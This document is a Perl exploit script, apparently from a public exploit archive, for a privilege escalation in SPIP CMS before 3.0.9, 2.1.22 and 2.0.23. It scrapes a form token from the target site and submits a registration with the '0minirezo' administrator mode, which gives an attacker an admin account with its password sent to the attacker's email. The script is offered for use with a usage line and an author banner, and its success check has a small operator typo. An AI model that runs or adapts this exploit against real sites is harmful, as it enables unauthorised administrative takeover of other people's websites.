SPIP < 3.0.9 / 2.1.22 / 2.0.23 Privilege Escalation

1. #!/usr/bin/perl
2. #             ->Author : CrashBandicot
3.  
4. use LWP::UserAgent;
5. use URI::Escape;
6. use HTTP::Request;
7.  
8. if($^O =~ /Win/){ system("cls"); }else{ system("clear"); }
9.  
10. banner();
11.  
12. my $usage = "\t        usage: $0 <www.site.com> <login> <mail>\n\n";
13.  
14. die "$usage" unless $ARGV[0] && $ARGV[1] && $ARGV[2];
15.  
16. $site = $ARGV[0];
17. $login = $ARGV[1];
18. $mail = $ARGV[2];
19.  
20. $link = "http://$site/spip.php?page=identifiants&mode=0minirezo";
21.  
22. $ua = LWP::UserAgent->new;
23. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
24. my $req = $ua->get($link)->content;
25. if($req =~/<input type='hidden' name='formulaire_action_args' value='(.*?)' \/>/ || $req =~ /<input name='formulaire_action_args' type='hidden' value='(.*?)' \/>/) {
26.  
27. $token = $1;
28.  
29. print "\n\n  [+] First Request Sended ..\n\n";
30.  
31. my $request = $ua->post($link,
32. {
33.         var_ajax => 'form',
34.         page => 'identifiants',
35.         mode => '0minirezo',
36.         formulaire_action => 'inscription',
37.         formulaire_action_args => $token,
38.         nom_inscription => $login,
39.         mail_inscription => $mail,
40.         nobot => '',
41. })->content;
42. if($request = ~/Votre nouvel identifiant vient de vous être envoyé par email/) {
43. print "  [+] Exploit Sended ..\n\n";
44. print "  [+] Go in your Inbox => $mail see your password ..\n\n";
45.  
46.  
47.  
48. } else { print "  [-] Exploit Failed ... \n"; exit; }
49.  
50.  
51. } else {  print "\n\n  [-] Token Not Found \n"; print "\n  [-] Exploit Failed \n"; exit;}
52.  
53. sub banner { print "\t\n          SPIP < 3.0.9 / 2.1.22 / 2.0.23 Privilege Escalation\n\n"; print "                Author -> CrashBandicot\n\n"; }